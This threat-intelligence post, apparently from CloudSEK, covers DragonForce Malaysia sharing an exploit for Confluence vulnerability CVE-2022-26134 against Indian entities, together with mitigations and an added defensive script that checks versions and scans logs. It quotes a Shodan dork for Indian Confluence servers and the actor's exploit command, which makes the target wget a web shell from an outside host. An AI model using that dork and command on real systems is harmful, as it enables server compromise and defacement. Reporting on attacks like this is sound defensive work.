Hacktivist Group DragonForce Actively Targeting Indian Entities, Shares an Exploit for a Critical Confluence Server Vulnerability CVE-2022-26134

Originally published at: https://cloudsek.com/threatintelligence/hacktivist-group-dragonforce-actively-targeting-indian-entities-shares-an-exploit-for-a-critical-confluence-server-vulnerability-cve-2022-26134/


Category: Adversary Intelligence
Threat Type: Latest Attack
Motivation: Hacktivist
Region: India
Source*: D4

Executive Summary

Threat
  • DragonForce Malaysia, the hacktivist group actively targeting Indian entities, announced and shared an exploit for CVE-2022-26134, a Confluence Server vulnerability.
  • The group has also shared a list of dorks targeting the Indian region on their Telegram channel.
Impact
  • Actors can scan the internet for vulnerable Confluence Server instances and leverage this vulnerability to launch attacks against significant Indian entities in both the government and private sectors.
Mitigation
  • Apply the patches and workarounds for CVE-2022-26134.
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.

CloudSEK’s contextual AI digital risk platform XVigil identified a post on a Telegram channel where the hacktivist group DragonForce Malaysia shared an exploit for CVE-2022-26134 to actively target and exploit Indian entities. CVE-2022-26134 is a critical unauthenticated remote code execution vulnerability in Confluence Server and Data Center.

DragonForce posting updates on their Telegram channel

Analysis and Attribution

Information from Cybercrime Forums

  • On 21 June 2022, a threat actor published a post on a cybercrime forum, mentioning a PoC (Proof of Concept) for the exploit along with the Shodan dork for Confluence Server vulnerabilities targeted towards the Indian region.

Shodan Dork: http.favicon.hash:-305179312 country:"IN"

  • The actor also shared a GitHub repository containing the exploit script, along with the following Python command for running it:
CVE-2022-26134.py http://targets.com “wget https://site.com/shell.txt -O DFM.php
  • Later that day, DragonForce Malaysia was seen sharing this exploit to all of their 152,257 subscribers on their Telegram channel.
  • A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
Cybercrime forum post discussing CVE-2022-26134


About DragonForce

  • On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
  • The group’s primary objective of the attack, as claimed by them, was to get back at the Indian Government for controversial comments on Prophet Muhammad by some Indian politicians.
  • The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
  • This group owns and operates a forum where they post announcements and discuss their latest activities.
  • The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
  • The group has been conducting regular recruitment and promotion campaigns using TikTok and Instagram reels.

DragonForce’s Official Communication Channels

Forum : https//dragonforce[.]io
Radio : https//radio[.]dragonforce[.]io
Facebook : https//fb[.]me/dragonforcedotio
Telegram : https//t[.]me/dragonforceio
Twitter : https//twitter[.]com/dragonforceio
Instagram : https//instagram[.]com/dragonforceio
YouTube : https//www.youtube[.]com/channel/UC9GycRXuy7-WMULPBkBp4Bw

Information from OSINT

  • Based on the information from the open web, CloudSEK researchers could identify that as of 4 June 2022 at least 23 unique IPs were exploiting this vulnerability.
  • A Shodan search showed that there are at least 9,396 publicly reachable instances of Confluence on the internet.
Source: Shodan


  • The data from Cloudflare indicates that this vulnerability is being exploited by multiple sources on a large scale.
Graph depicting the exploitation of CVE-2022-26134 (Source: Cloudflare)


Impact & Mitigation

Impact
  • DragonForce collaborates with multiple hacktivist groups in its campaign against Indian entities. This exploit gives them more opportunities to deface Indian entities' websites and dump their databases.
  • Attackers can use this vulnerability to execute commands remotely.
  • Threat actors can leverage this opportunity to target victims and deploy ransomware.
  • Potential loss of revenue, reputation, and intellectual property.
Mitigation
  • Confluence Server and Data Center need to be updated to one of the following patched versions:
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
  • Audit and monitor anomalies in networks that could be indicators of possible compromise.
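The following script is an added example (not CloudSEK's code, nor anything shared by the threat actor) that turns the two mitigation items above into checks a defender can run: it compares an installed Confluence version against the patched releases listed in this post, and it scans web access log lines for the request pattern associated with CVE-2022-26134. That the exploit vector is an OGNL expression ("${...}") injected into the request URI path is an assumption taken from Atlassian's advisory for this CVE rather than from this post; the log lines, IP addresses and the "${1+1}" probe expression are constructed samples.

```python
"""Defender-side checks for CVE-2022-26134 (added example, not the post's code)."""
import re
from urllib.parse import unquote

# Patched releases exactly as listed in the advisory above.
PATCHED = ["7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1"]


def parse_version(version):
    """Turn '7.13.6' into (7, 13, 6) so versions compare numerically."""
    return tuple(int(part) for part in version.split("."))


def version_status(installed):
    """Return (is_patched, recommended_version) for an installed release.

    If the installed release sits on a branch (major.minor) that has a fixed
    build in PATCHED, that fixed build is the upgrade target. If the branch has
    no fixed build (e.g. 7.12.x), the newest patched release is recommended.
    Anything newer than the newest listed release is treated as already fixed.
    """
    inst = parse_version(installed)
    branch = inst[:2]
    fixed_on_branch = [p for p in PATCHED if parse_version(p)[:2] == branch]
    if fixed_on_branch:
        target = fixed_on_branch[0]
        return inst >= parse_version(target), target
    newest = max(PATCHED, key=parse_version)
    if inst >= parse_version(newest):
        return True, installed
    return False, newest


# Common Log Format: ip ident user [timestamp] "METHOD URI PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption (from Atlassian's advisory): the CVE-2022-26134 vector is an
# OGNL expression in the URI *path*, so "${" after URL-decoding is the marker.
OGNL_MARKER = re.compile(r"\$\{")


def scan_access_log(lines):
    """Return (ip, raw_uri) for requests whose decoded URI path contains '${'.

    Only the path is inspected (query strings are dropped) so that legitimate
    search queries containing '$' are not flagged.
    """
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in Common Log Format
        path = match.group("uri").split("?", 1)[0]
        if OGNL_MARKER.search(unquote(path)):
            hits.append((match.group("ip"), match.group("uri")))
    return hits


# Constructed sample log lines; 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Jun/2022:10:01:12 +0000] "GET /login.action HTTP/1.1" 200 5120',
    '203.0.113.7 - - [04/Jun/2022:10:01:40 +0000] "GET /%24%7B1%2B1%7D/ HTTP/1.1" 302 0',
    '203.0.113.9 - - [04/Jun/2022:10:02:03 +0000] "GET /dosearchsite.action?queryString=price%24100 HTTP/1.1" 200 8812',
]

if __name__ == "__main__":
    for installed in ["7.13.6", "7.13.7", "7.12.5", "7.19.0"]:
        patched, target = version_status(installed)
        print(f"{installed}: {'patched' if patched else 'UPGRADE to ' + target}")
    for ip, uri in scan_access_log(SAMPLE_LOG):
        print(f"possible CVE-2022-26134 probe from {ip}: {uri}")
```

The version check keys on the major.minor branch because the patched builds are branch-specific; an installation on a branch with no listed fix (7.12.x, for instance) must move to a newer branch. The log scan decodes the path before matching, since the marker is usually URL-encoded in real traffic, and it ignores the query string to keep the false-positive rate low.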
